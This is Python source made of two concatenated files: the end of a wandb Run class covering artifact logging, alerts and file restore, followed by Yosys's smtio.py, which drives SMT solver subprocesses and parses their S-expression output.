""" Declare an artifact as output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(artifact_or_path, name, type, aliases)
def upsert_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Declare (or append tp) a non-finalized artifact as output of a run. Note that you must call
run.finish_artifact() to finalize the artifact. This is useful when distributed jobs
need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Finish a non-finalized artifact as output of a run. Subsequent "upserts" with
the same distributed ID will result in a new version
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
finalize = True,
is_user_created = False,
use_after_commit = False,
):
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self):
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact): # type: ignore
if not self._settings._offline:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title,
text,
level = None,
wait_duration = None,
):
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
"""
level = level or wandb.AlertLevel.INFO
if isinstance(level, wandb.AlertLevel):
level = level.value
if level not in (
wandb.AlertLevel.INFO.value,
wandb.AlertLevel.WARN.value,
wandb.AlertLevel.ERROR.value,
):
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend:
self._backend.interface.publish_alert(title, text, level, wait_duration)
def __enter__(self):
return self
def __exit__(
self,
exc_type,
exc_val,
exc_tb,
):
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
# We define this outside of the run context to support restoring before init
def restore(
name,
run_path = None,
replace = False,
root = None,
):
""" Downloads the specified file from cloud storage into the current directory
or run directory. By default this will only download the file if it doesn't
already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propagate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code = None):
"""
Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code)
class _LazyArtifact(ArtifactInterface):
# _api: PublicApi
_instance = None
# _future: Any
def __init__(self, api, future):
self._api = api
self._future = future
def _assert_instance(self):
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item):
self._assert_instance()
return getattr(self._instance, item)
def wait(self):
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(self._instance, ArtifactInterface)
return self._instance
@property
def id(self):
return self._assert_instance().id
@property
def version(self):
return self._assert_instance().version
@property
def name(self):
return self._assert_instance().name
@property
def type(self):
return self._assert_instance().type
@property
def entity(self):
return self._assert_instance().entity
@property
def project(self):
return self._assert_instance().project
@property
def manifest(self):
return self._assert_instance().manifest
@property
def digest(self):
return self._assert_instance().digest
@property
def state(self):
return self._assert_instance().state
@property
def size(self):
return self._assert_instance().size
@property
def commit_hash(self):
return self._assert_instance().commit_hash
@property
def description(self):
return self._assert_instance().description
@description.setter
def description(self, desc):
self._assert_instance().description = desc
@property
def metadata(self):
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata):
self._assert_instance().metadata = metadata
@property
def aliases(self):
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases):
self._assert_instance().aliases = aliases
def used_by(self):
return self._assert_instance().used_by()
def logged_by(self):
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name):
return self._assert_instance().get_path(name)
def get(self, name):
return self._assert_instance().get(name)
def download(self, root = None, recursive = False):
return self._assert_instance().download(root, recursive)
def checkout(self, root = None):
return self._assert_instance().checkout(root)
def verify(self, root = None):
return self._assert_instance().verify(root)
def save(self):
return self._assert_instance().save()
def delete(self):
return self._assert_instance().delete()
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
if self.debug_file:
return
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
if self.p is None:
return
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
if self.debug_file:
return "unsat"
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
if self.debug_file:
return False
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
result = "unsat"
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
